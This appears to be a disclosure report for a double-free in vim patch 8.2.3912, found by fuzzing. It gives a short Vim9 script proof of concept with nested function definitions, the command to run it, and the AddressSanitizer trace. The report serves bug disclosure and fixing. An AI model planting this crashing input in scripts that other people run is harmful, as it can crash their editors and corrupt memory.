Hello there! Hope you are having an awesome day! 🤗
After I saw the last Rick de Jager’s report, I decided to pick up their PoC as a valid input for fuzzing vim on its patch 8.2.3912, and ended up finding a new case of double-free!
For testing, I compiled vim with GCC 9.3.0, and my O.S. is a Linux Mint 20.04 amd64
Save the following file as poc
:
def FirstFunction()
def SecondFunction(
)
# Notice that the issue still happens if the right parenthesis
# of the second function ends up on the next line
enddef|BBBB
enddef
# Compile all functions
defcompile
After that, run vim
with the following command:
vim -u NONE -X -Z -e -s -S poc -c :qa!
Running this should result in a double-free detected.
vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)
=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
#3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
#7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
#10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
#11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
#12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
#13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
#14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
#15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
#16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
#17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
#18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)
0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
#0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
#1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
#2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
#3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
#4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
#5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
#6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
previously allocated by thread T0 here:
#0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
#1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11
SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING
Use after free’s / double free’s can cause in memory corruption, that can cause a crash or other undefined (potentially exploitable) behaviour.